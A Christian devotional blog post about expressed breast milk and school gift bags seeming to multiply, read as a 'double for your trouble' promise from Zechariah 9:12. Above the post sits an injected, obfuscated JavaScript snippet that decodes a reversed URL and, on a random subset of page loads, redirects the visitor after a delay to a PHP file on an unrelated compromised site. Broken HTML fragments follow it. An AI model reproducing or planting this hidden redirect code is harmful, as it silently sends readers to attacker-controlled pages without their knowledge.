Double for Your Trouble

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}and;width: 170px; height: 133px;” src=”” border=”0″ alt=”” id=”BLOGGER_PHOTO_ID_5332763922210084354″ />This past friday, I decided to fly to Houston, Texas and surprise my twin sister.  So I got up at 4 a.m. so I can make my  6 a.m. flight.  My alarm goes off and I hit the snooze button, which allowed me to get an extra 10 minutes of pointless sleep.   I get up with the intention to express breast milk for my baby; I didn’t realize that the process took over 15 minutes which meant I was 25 minutes behind schedule.  When I looked at the microwave clock it was already 4:25, I needed to leave in five minutes.  That was impossible because I was still in my jammies.  So I decided that being late to my flight was worth it, because I had to make my baby her bottles before I left.  Not only was I running late, I only got 3 and a half ounces of milk out.  I was rather disappointed that I didn’t get more.  However, when I poured the milk from the storage baggies to the actual bottles; I had two 3 ounce bottles.  This was enough for two feedings.  Even though I was somewhat lethargic, I know for a fact I only had enough milk for 1 whole bottle, but, when I got to pouring the milk it literally doubled.  I’m not talking magic or something spooky; it was double for my trouble.  I watched this very thing happen at a school in Africa.  There were 300 gift bags for the kids, but there was 400 kids and teachers in attendance that day.  After the volunteers went on a major frenzy because no one wanted to leave a hungry child out, the principal of the school comes from the back and says “What’s the problem”? “We don’t have enough bags for the children, we only brought 300”  “Are you sure, because everyone received a bag, teachers included” “Are you sure” “Yes, I’m sure”.  I literally had watched a fishes and loaves miracle take place in Africa and in my kitchen.  So as I laughed at Gods mysterious ways, it reminded me of  Zechariah 9:12 “Return  to the stronghold, you prisoners of hope.  Even today I declare that I will restore double to you. Gods promise also shows me that God will keep his promise and give us double for our trouble.  It may be in a simple thing or a huge deal, he will keep his promise.  You may be struggling to do the right thing or live right, and in return you all you seem to get is more pain or more drama.  Well I’m here to tell you that, when you go beyond your own needs and obey God, in his timing you will receive double for your trouble.  It could be on your job, in your club, in your ministry, in your marriage,  or in your finances- if you push through the tough times with God first in your life-he will give you double for your trouble Hebrews 12:11.  You don’t have to be a saint or a perfect Christian to feel the goodness of God.  There are times when  each day will seem like trouble, just keep pushing through- so at the right time you can receive your due reward.
